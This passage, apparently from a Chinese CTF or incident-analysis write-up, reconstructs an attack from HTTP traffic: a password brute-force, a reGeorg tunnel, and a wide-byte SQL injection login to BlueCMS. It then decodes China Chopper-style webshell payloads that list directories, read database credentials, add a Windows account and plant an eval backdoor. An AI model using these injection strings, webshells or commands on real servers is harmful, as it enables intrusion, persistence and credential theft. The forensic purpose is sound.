username=admin&passwd=apple&lang=&option=com_login&task=login&return=aW5kZXgucGhw&f2426d9ea34e95fe916e6309d7028835=1
username=admin&passwd=apple&option=com_login&task=login&return=aW5kZXgucGhw&2bb30f381fad54b0ca7f4088e7e9cc97=1
可以看到攻击者在之前对管理员密码进行了爆破
最后出现了两个相同的账号密码为 admin/apple
猜测极有可能是正确的密码
对比一下之前和最后的相应包
尝试一个错误密码的时候 , 返回了 303 See Other , 并重定向到了 /administrator/index.php
在 index.php 内容中也可以找到 :
<p class="alert-message">Username and password do not match or you do not have an account yet.</p>
而在真正登录成功的时候 , 虽然也是返回 303 , 重定向到 /administrator/index.php
但是可以发现 , index.php 的内容是明显不同的
攻击者经过爆破密码得到了管理员的密码 admin/apple
到这里 Jshell 的分析应该差不多了
接下来看一下攻击者上传如何上传 Bshell
Bshell 是存在于内网的 , 攻击者通过 reGeord 进行内网渗透 , 跳板文件名为 tunnel.php
这里存在一个小技巧
tunnel.php 在实现的时候 , 每一个独立的 TCP 连接会由同一个 Session 维护
所以可以根据 PHPSESSID 来跟踪一个发向内网的 HTTP 请求
发起一个新的链接的 URL 会是这样 ?cmd=connect&target=8.8.8.8&port=8888
发送数据会是这样 ?cmd=forward
读取数据 : ?cmd=read
断开连接 : ?cmd=disconnect
在这里进行了登录
admin_name=simple%d5%27%20or%201%3d1%23&admin_pwd=simple&submit=%B5%C7%C2%BC&act=do_login
// 这里直接使用了宽字节注入成功登录
然后使用模板编辑器 /admin/tpl_manage.php 对 ../data/config.php 进行了编辑
这里攻击者已经创建了 webshell , 接下来分析攻击者是如何利用 webshell 的
grep -o 'Bshell.*' http.txt > Bshell
with open("Bshell") as f:
for line in f:
import urllib
print "-" * 32
data = ("Bshell=@eval(ba" + urllib.unquote(line)[16:-1])
print data
data = data.split("&")
for i in data[1:]:
d = i.split("=")
key = d[0]
value = ("".join("%s=" % (i) for i in d[1:]))[0:-1]
try:
print "%s=%s" % (key, value.decode("base64"))
except:
print "%s=%s" % (key, (value + (4 - len(d[1]) % 4) * "=").decode("base64"))
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfVx0IjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJBIiwiWiIpIGFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9JFIuPSJcdCI7JHU9KGZ1bmN0aW9uX2V4aXN0cygncG9zaXhfZ2V0ZWdpZCcpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2dldGV1aWQoKSk6Jyc7JHVzcj0oJHUpPyR1WyduYW1lJ106QGdldF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIoeyR1c3J9KSI7cHJpbnQgJFI7O2VjaG8oInw8LSIpO2RpZSgpOw==
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("|<-");die();
// 获取目标服务器系统信息, 用户名
->|C:/phpstudy/WWW/bluecms/data C:D: Windows NT OA-43EAD51FB6C5 5.1 build 2600 (Windows XP Professional Service Pack 3) i586(Administrator)|<-
--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXA==
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\
// 获取目标服务器 C:\\ 目录的所有文件
addons/ 2017-08-29 03:38:21 0 0777
Documents and Settings/ 2017-09-06 03:58:45 0 0777
phpstudy/ 2017-09-06 03:39:12 0 0777
Program Files/ 2017-09-06 03:53:46 0 0555
RECYCLER/ 2017-08-29 03:37:07 0 0777
System Volume Information/ 2017-07-24 03:56:23 0 0777
WINDOWS/ 2017-08-28 06:55:01 0 0777
AUTOEXEC.BAT 2017-07-24 03:54:32 0 0777
boot.ini 2017-07-24 03:52:40 211 0666
bootfont.bin 2008-04-14 12:00:00 322730 0444
CONFIG.SYS 2017-07-24 03:54:32 0 0666
IO.SYS 2017-07-24 03:54:32 0 0444
MSDOS.SYS 2017-07-24 03:54:32 0 0444
NTDETECT.COM 2008-04-14 12:00:00 47564 0555
ntldr 2008-04-14 12:00:00 257728 0444
pagefile.sys 2017-09-07 11:47:21 805306368 0666
--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXA==
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\
// 获取目标服务器 C:\\ 目录的所有文件
--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=&z1=Y21k&z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xibHVlY21zXGRhdGFcIiZuZXQgdXNlciBibHVlaGFja2VyIHJlZGhhY2tlcjFAMyAvYWRkJmVjaG8gW1NdJmNkJmVjaG8gW0Vd
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\bluecms\data\"&net user bluehacker redhacker1@3 /add&echo [S]&cd&echo [E]
// 执行系统命令 net user bluehacker redhacker1@3 /add
--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=&z1=Y21k&z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xibHVlY21zXGRhdGFcIiZuZXQgdXNlciBibHVlaGFja2VyIHJlZGhhY2tlcjFAMyAvYWRkJmVjaG8gW1NdJmNkJmVjaG8gW0Vd
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\bluecms\data\"&net user bluehacker redhacker1@3 /add&echo [S]&cd&echo [E]
// 执行系统命令 net user bluehacker redhacker1@3 /add
--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXHBocHN0dW
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstu
// 获取目标服务器 C:\\phpstu 目录的所有文件
->|./ 2017-09-07 08:26:56 0 0777
../ 2017-09-06 03:39:12 0 0777
bluecms/ 2017-09-07 08:27:01 0 0777
metinfo/ 2017-09-07 07:05:58 0 0777
phpMyAdmin/ 2017-09-06 03:38:48 0 0777
l.php 2014-02-27 15:02:21 21201 0666
phpinfo.php 2013-05-09 12:56:36 23 0666
|<-
--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXHBocHN0dW
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstu
// 获取目标服务器 C:\\phpstu 目录的所有文件
--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXHBocHN0dWR5XFxXV1dcXA==
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\
// 获取目标服务器 C:\\phpstudy\\WWW\\ 目录的所有文件
->|./ 2017-09-07 08:27:01 0 0777
../ 2017-09-07 08:26:56 0 0777
admin/ 2017-09-07 08:27:02 0 0777
api/ 2017-09-07 08:27:01 0 0777
data/ 2017-09-07 08:33:05 0 0777
images/ 2017-09-07 08:27:01 0 0777
include/ 2017-09-07 08:26:59 0 0777
install/ 2017-09-07 08:26:57 0 0777
js/ 2017-09-07 08:26:57 0 0777
templates/ 2017-09-07 08:26:56 0 0777
uc_client/ 2017-09-07 08:26:56 0 0777
ad_js.php 2010-02-08 13:40:00 869 0666
ann.php 2010-02-08 13:39:54 2478 0666
category.php 2010-02-08 13:47:48 8821 0666
comment.php 2010-02-08 13:39:40 3531 0666
guest_book.php 2010-02-08 13:51:28 2538 0666
index.php 2010-02-08 13:40:08 7471 0666
info.php 2010-02-08 13:50:02 4527 0666
info_index.php 2010-02-08 13:50:50 1869 0666
news.php 2010-01-07 10:02:34 3477 0666
news_cat.php 2010-02-08 13:54:52 2069 0666
publish.php 2010-02-09 03:40:36 9185 0666
robots.txt 2009-12-01
--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXA==
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\
// 获取目标服务器 C:\\phpstudy\\WWW\\bluecms\\ 目录的所有文件
->|./ 2017-09-07 08:33:05 0 0777
../ 2017-09-07 08:27:01 0 0777
admin/ 2017-09-07 08:27:01 0 0777
backup/ 2017-09-07 08:27:01 0 0777
cache/ 2017-09-07 08:27:01 0 0777
compile/ 2017-09-08 02:30:03 0 0777
upload/ 2017-09-07 08:27:01 0 0777
bannedip.cache.php 2017-09-08 09:24:52 25 0666
config.cache.php 2017-09-07 08:33:05 550 0666
config.php 2017-09-08 09:27:58 276 0666
index.htm 2009-10-02 12:46:24 894 0666
update_log.txt 2017-09-07 08:42:58 8 0666
--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXHBocHN0dW
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstu
// 获取目标服务器 C:\\phpstu 目录的所有文件
--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw==&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXGRhdGFcXGNvbmZpZy5waHA=
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\data\\config.php
// 获取 C:\\phpstudy\\WWW\\bluecms\\data\\config.php 文件内容
->|<?php
$dbhost = "localhost";
$dbname = "bluecms";
$dbuser = "root";
$dbpass = "123456";
$pre = "blue_";
$cookiedomain = '';
$cookiepath = '/';
@eval($_POST['Bshell']);
define('BLUE_CHARSET','gb2312');
define('BLUE_VERSION','v1.6');
?>|<-
--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskZj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JGM9JF9QT1NUWyJ6MiJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1Zik/IjEiOiIwIik7O2VjaG8oInw8LSIpO2RpZSgpOw==&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXGRhdGFcXGZvb3QucGhw&z2=3C3F706870206576616C28245F504F53545B27636D645F7368656C6C275D293B3F3E
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$f=base64_decode($_POST["z1"]);$c=$_POST["z2"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\data\\foot.php
z2=<?php eval($_POST['cmd_shell']);?>
// 将 <?php eval($_POST['cmd_shell']);?> 写入 C:\\phpstudy\\WWW\\bluecms\\data\\foot.php
--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskZj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JGM9JF9QT1NUWyJ6MiJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1Zik/IjEiOiIwIik7O2VjaG8oInw8LSIpO2RpZSgpOw==&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXGRhdGFcXGZvb3QucGhw&z2=3C3F706870206576616C28245F504F53545B27636D645F7368656C6C275D293B3F3E
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$f=base64_decode($_POST["z1"]);$c=$_POST["z2"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\data\\foot.php
z2=<?php eval($_POST['cmd_shell']);?>
// 将 <?php eval($_POST['cmd_shell']);?> 写入 C:\\phpstudy\\WWW\\bluecms\\data\\foot.php
--------------------------------
